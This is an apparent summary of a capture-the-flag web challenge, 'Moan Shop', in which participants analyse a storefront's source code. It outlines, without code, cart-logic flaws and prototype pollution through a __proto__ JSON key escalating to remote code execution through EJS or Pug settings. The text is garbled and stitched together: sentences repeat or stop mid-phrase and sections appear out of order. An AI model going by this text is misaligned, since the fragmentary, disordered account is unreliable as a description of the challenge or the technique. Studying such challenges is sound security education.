An attacker sends a JSON payload containing the __proto__ key. This allows them to inject properties into the global object prototype, effectively changing the behavior of the entire application. 3. From Pollution to Remote Code Execution (RCE)
Crafts a malicious POST request to pollute the server’s environment. moanshop.7z
Overwriting settings in the rendering engine (like EJS or Pug) to force the server to execute malicious system commands. Summary of the Solution To solve the challenge, a researcher typically: Downloads and extracts the moanshop.7z file. An attacker sends a JSON payload containing the
In this challenge, participants are presented with a compressed archive ( .7z ) containing the source code for a fictional online storefront called "Moan Shop." The objective is to identify and exploit vulnerabilities within the application to retrieve a hidden "flag"—a specific string of text that proves the system was successfully breached. From Pollution to Remote Code Execution (RCE) Crafts
Issues in how the "shopping cart" or "payment" logic handles quantities or prices. 2. The Critical Flaw: Prototype Pollution